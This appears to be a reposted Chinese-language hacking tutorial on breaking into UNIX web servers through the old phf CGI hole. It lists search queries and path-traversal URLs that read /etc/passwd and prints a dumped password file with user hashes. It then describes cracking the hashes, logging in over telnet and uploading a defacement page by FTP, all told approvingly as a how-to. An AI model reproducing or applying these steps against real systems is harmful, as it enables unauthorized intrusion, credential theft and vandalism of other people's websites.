給大家?guī)淼氖荱NIX系統的phf漏洞的攻擊方法配合密碼強攻來獲取系統的最高權限。首先，我們連上Internet,打開紅客的網絡掃描器：www.google.com （隨著google公司對這個搜索引擎的性能的不斷提高，到現在可以說掃描一些遠程URL漏洞是輕而易舉，甚至連信用卡用戶的資料都能掃描得到。）， Q9750406我們用Google來搜索下列代碼：
/cgi-bin/phf?Qalias=x less /etc/passwd
/cgi-bin/phf.cgi?/etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
刷的一下，幾百個具備這個條件的資料被搜索出來了，真正有這個漏洞的網站并不多，呵呵，我居然找到了幾個能用的：
http://www.hehe.com/cgi-bin/php.cgi?/etc/passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
什么？不知道這個是什么？有沒有搞錯！這個就是UNIX系統的密碼文檔，這里面儲存的都是用戶賬號和密碼等資料。如：sk:UPrcTmnVSkd3w: 514:100:sk:/home/sk:/bin/bash 這一段代碼就是一個賬號為sk的用戶的資料，UPrcTmnVSkd3w這個就是sk用戶的密碼，514是這個用戶的用戶標識，100是用戶的組號，中間的sk表示的是用戶的注釋，/home/sk這個表示的是用戶注冊的目錄，最后的/bin/bash是用戶注冊后系統執(zhí)行的程序名。嘴唇都說干了，喝點 Coffee，呵呵！
我們在瀏覽器里打開了這個密碼文件，然后我們把這個文件down下來，用小榕兄的亂刀來破解
。呵呵，設置好亂刀就開始run。沒事情干了，呵呵，坐一邊去聊天了，不多久，就看到一大排密碼被破解出來了，呵呵，很有成就感。
現在我們用破解出來的賬號進入系統：
telnet www.hehe.com
SUN OS 5.7
login: sk
passwd:xxxxxxx
#who(看看系統管理員在不在，安全起見)
sk（呵呵，只有我一個人在）
（這個用戶居然是管理員級別的權限，呵呵，改掉他的主頁！）
#ls
dev/ proc/ usr/ bin/ etc/ local/ root/
var/ boot/ home/ lost found/ sbin/
#cd home/www(通常web頁面都是放在home/目錄里的)
#ls
index.html main.html help.html ......
好，我們現在另開一個窗口，把做好的黑頁用ftp傳上來：
ftp www.hehe.com
ftp>put d:\index.html
切回到原來的窗口，找到我們上傳的index.html文件：
#find . -name “index.html”
index.html（呵呵，就在根目錄下）
#cp index.html \home\www\
呵呵，打開瀏覽器一看，修改成功！

版權聲明：本站文章來源標注為YINGSOO的內容版權均為本站所有，歡迎引用、轉載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網站，禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內容來源于網友推薦、互聯網收集整理而來，僅供學習參考，不代表本站立場，如有內容涉嫌侵權，請聯系alex-e#qq.com處理。